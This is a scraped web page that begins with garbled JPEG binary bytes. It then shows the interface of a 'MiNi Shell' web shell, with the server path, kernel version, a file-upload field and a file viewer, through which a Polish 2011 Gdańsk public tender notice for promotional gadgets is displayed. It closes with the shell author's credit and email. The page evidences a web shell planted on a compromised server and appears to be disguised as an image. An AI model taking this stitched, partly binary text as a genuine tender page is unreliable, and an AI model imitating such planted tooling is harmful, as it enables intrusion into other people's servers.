JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110322/91557-N-2011.html

<p class="kh_header"><b>Gdańsk: Wykonanie gadżetów reklamowych Miasta Gdańska tj. toreb. długopisów, smyczy, balonów i chorągiewek</b><br>
<b>Numer ogłoszenia: 91557 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Gdańsk Urząd Miejski w Gdańsku , ul. Nowe Ogrody 8/12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3236129, faks 58 3236529.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie gadżetów reklamowych Miasta Gdańska tj. toreb. długopisów, smyczy, balonów i chorągiewek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa dostarczenia gadżetów reklamowych Miasta Gdańska tj. toreb, długopisów, smyczy, balonów oraz chorągiewek
Przedmiot zamówienia został podzielony na 6 części. <br>
1.1.Część nr 1 - Torby reklamowe: <br>
Torby reklamowe wykonane z papieru kredowego 170g/m2, laminat mat, torba biała z nadrukiem dwóch kolorów (apla kolor czerwony Pantone 186 C i napisy czarne) - 100% zadruku. Nadruk dwustronny, dwie strony torby identyczne. Uchwyt przewlekany ze sznurka poliestrowego w kolorze apli. Usztywnione dno (tekturką 350g/m2) i góra torby (tekturką 960g/m2-1,6mm). Nadruk wg. wzoru dostarczonego przez Zamawiającego. Wzór - załącznik nr 1 do siwz. <br>
1) Rozmiar: szer. 24 cm wys. 34 cm gł. 9 cm - 23 000 sztuk. <br>
2) Rozmiar: szer. 20 cm wys. 24 cm gł. 9 cm - 10 000 sztuk. <br>
1.2.Część nr 2 - Torby podręczne - 100 sztuk: <br>
Torby typu Mark Twain wykonane z nylonu 1681D i skóry wymiary 37x27x7 cm, kieszeń na zamek magnetyczny z tyłu - z przodu dwa magnesy, wewnątrz kieszeń na zamek i kieszonki na telefon, wizytówki. Pasek z miękką nakładką na ramię. Nadruk wg. wzoru dostarczonego przez  Zamawiającego. Wzór -załącznik nr 2 do siwz. <br>
1.3.Część nr 3 - Długopisy reklamowe - 25 000 sztuk. <br>
Długopisy typu Galaxy metal klip,dł. 145 mm, metalowy klip, gładki polerowany-pełny, końcówka metalowa, mechanizm typu TWIST, wkład niebieski. Długopisy pakowane po 100 szt. w worek foliowy. Nadruk  jeden kolor wg wzoru dostarczonego przez Zamawiającego. Wzór - załącznik nr 3 do siwz. <br>
1) Kolor czarny - 12 500 szt. <br>
2) Kolor czerwony -12 500 szt. <br>
1.4.Część nr 4 - Smycze promocyjne 30 000 sztuk. <br>
Smycze odblaskowe, kolor czerwony: szer. 1,5 cm, dł. 93 cm, materiał 100 % poliester, smycz tkana, 1 kolor nadruku po jednej stronie wg. wzoru Zamawiającego, metalowy karabińczyk, zaczep do komórki. Wzór - załącznik nr 4 do siwz. <br>
1.5.Część nr 5- Balony reklamowe + akcesoria : patyk , zapinka  - 20 000 sztuk. <br>
Balony lateksowe wykonane z 100% naturalnego kauczuku, rodzaj: pastel, rozmiar B-85-10,5 (cali), waga balonu do nadruku: B-85 - 2,7 gr.<br>
1) Kolor czerwony - 101-red nadruk biały - 10000 szt. nadruk wg wzoru dostarczonego przez Zamawiającego jeden kolor nadruku. Wzór - załącznik nr 5 do siwz. <br>
2) Kolor biały - 002 white  nadruk dwa kolory: czerwony i czarny- 10000 szt. . nadruk wg wzoru dostarczonego przez Zamawiającego dwa  kolory nadruku. Wzór - załącznik nr 6 do siwz. <br>
1.6.Część nr 6 - Chorągiewki reklamowe - 20 000 sztuk. <br>
Papier offset 100 g, format A5 (150x210mm), full color , patyczek plastikowy 350 mm, śr. 4 mm. Dwa rodzaje nadruku  wg. wzoru Zamawiającego. <br>
1) czerwona - 10 000 sztuk - wzór - załącznik nr 7 do siwz. <br>
2) kremowa dwustronna - 10 000 sztuk - wzór - załącznik nr 8 do siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 35.12.34.00-6, 18.93.00.00-7, 30.19.21.21-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 1 : Torby reklamowe. <br>
Opis sposobu dokonywania oceny spełniania warunku. <br>
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizował co najmniej dwie usługi polegające na wykonaniu i dostarczeniu toreb papierowych o wartości łącznej co najmniej 10 000 zł brutto, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie. <br>
Część nr 2 : Torby podręczne. <br>
Opis sposobu dokonywania oceny spełniania warunku. <br>
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizował co najmniej dwie usługi polegające na wykonaniu i dostarczeniu toreb z nylonu o wartości łącznej co najmniej 5 000 zł brutto, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie. <br>
Części nr 3 : Długopisy reklamowe. <br>
Opis sposobu dokonywania oceny spełniania warunku. <br>
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizował co najmniej dwie usługi polegające na wykonaniu i dostarczeniu długopisów reklamowych o wartości łącznej co najmniej 10 000 zł brutto, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie. <br>
Części nr 4 : Smycze promocyjne. <br>
Opis sposobu dokonywania oceny spełniania warunku. <br>
Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że zrealizował co najmniej dwie usługi polegające na wykonaniu i dostarczeniu smyczy promocyjnych o wartości łącznej co najmniej 10 000 zł brutto, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie. <br>
Dla części nr 5 i 6 Zamawiający nie wymaga warunku posiadania wiedzy i doświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. W szczególności należy do nich nadzwyczajna zmiana stosunków, w tym zmiana przepisów, w oparciu o które realizowane jest niniejsze zamówienie. <br>
2.Zmiany umowy wymagają dla swojej ważności formy pisemnej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gdansk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych Urzędu Miejskiego w Gdańsku, ul. Nowe Ogrody 8/12, 80-803 Gdańsk, pokój 127.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2011 godzina 10:00, miejsce: Urząd Miejski w Gdańsku, ul. Nowe Ogrody 8/12, 80-803 Gdańsk, Sala Obsługi Mieszkańców, stanowiska 14-17. Otwarcie ofert : 30.03.2011 r. godz. 10:30, pokój 132 A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamawiający nie zamierza zawierać umowy ramowej ani ustanawiać dynamicznego systemu zakupów, a także nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej. <br>
2. Osobą uprawnioną do porozumiewania się z Wykonawcami jest pracownik Biura Zamówień Publicznych Urzędu Miejskiego w Gdańsku - Marzena Szczepańska, pokój 127, tel. (58) 323-61-84, fax. (58) 323-62-59, e-mail: marzena.szczepanska@gdansk.gda.pl, w dniach pon., wt., czw. - w godzinach od 8:00 do 16:00, w śr. - w godz. od 8:00 do 17:00, w pt. - od 8:00 do 15:00. <br>
3. Sygnatura postępowania : BZP-271-021/22/23/BPPM/11/MS. <br>
4. Termin realizacji zamówienia - 6 tygodni od dnia zawarcia umowy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Torby reklamowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Torby reklamowe wykonane z papieru kredowego 170g/m2, laminat mat, torba biała z nadrukiem dwóch kolorów (apla kolor czerwony Pantone 186 C i napisy czarne) - 100% zadruku. Nadruk dwustronny, dwie strony torby identyczne. Uchwyt przewlekany ze sznurka poliestrowego w kolorze apli. Usztywnione dno (tekturką 350g/m2) i góra torby (tekturką 960g/m2-1,6mm). Nadruk wg. wzoru dostarczonego przez Zamawiającego. Wzór - załącznik nr 1 do siwz. <br>
1)Rozmiar: szer. 24 cm wys. 34 cm gł. 9 cm - 23 000 sztuk. <br>
2)Rozmiar: szer. 20 cm wys. 24 cm gł. 9 cm - 10 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 35.12.34.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Torby podręczne - 100 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Torby typu Mark Twain wykonane z nylonu 1681D i skóry wymiary 37x27x7 cm, kieszeń na zamek magnetyczny z tyłu - z przodu dwa magnesy, wewnątrz kieszeń na zamek i kieszonki na telefon, wizytówki. Pasek z miękką nakładką na ramię. Nadruk wg. wzoru dostarczonego przez  Zamawiającego. Wzór -załącznik nr 2 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 35.12.34.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Długopisy reklamowe - 25 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Długopisy typu Galaxy metal klip,dł. 145 mm, metalowy klip, gładki polerowany-pełny, końcówka metalowa, mechanizm typu TWIST, wkład niebieski. Długopisy pakowane po 100 szt. w worek foliowy. Nadruk  jeden kolor wg wzoru dostarczonego przez Zamawiającego. Wzór - załącznik nr 3 do siwz. <br>
1) Kolor czarny - 12 500 szt. <br>
2) Kolor czerwony -12 500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 30.19.21.21-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Smycze promocyjne 30 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Smycze odblaskowe, kolor czerwony: szer. 1,5 cm, dł. 93 cm, materiał 100 % poliester, smycz tkana, 1 kolor nadruku po jednej stronie wg. wzoru Zamawiającego, metalowy karabińczyk, zaczep do komórki. Wzór - załącznik nr 4 do siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6, 35.12.34.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Balony reklamowe + akcesoria : patyk , zapinka  - 20 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Balony lateksowe wykonane z 100% naturalnego kauczuku, rodzaj: pastel, rozmiar B-85-10,5 (cali), waga balonu do nadruku: B-85 - 2,7 gr. <br>
1) Kolor czerwony - 101-red nadruk biały - 10000 szt. nadruk wg wzoru dostarczonego przez Zamawiającego jeden kolor nadruku. Wzór - załącznik nr 5 do siwz. <br>
2) Kolor biały - 002 white  nadruk dwa kolory: czerwony i czarny- 10000 szt. . nadruk wg wzoru dostarczonego przez Zamawiającego dwa  kolory nadruku. Wzór - załącznik nr 6 do siwz. <br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Chorągiewki reklamowe - 20 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier offset 100 g, format A5 (150x210mm), full color , patyczek plastikowy 350 mm, śr. 4 mm. Dwa rodzaje nadruku  wg. wzoru Zamawiającego. <br>
1) czerwona - 10 000 sztuk - wzór - załącznik nr 7 do siwz. <br>
2) kremowa dwustronna - 10 000 sztuk - wzór - załącznik nr 8 do siwz. <br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 22.46.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com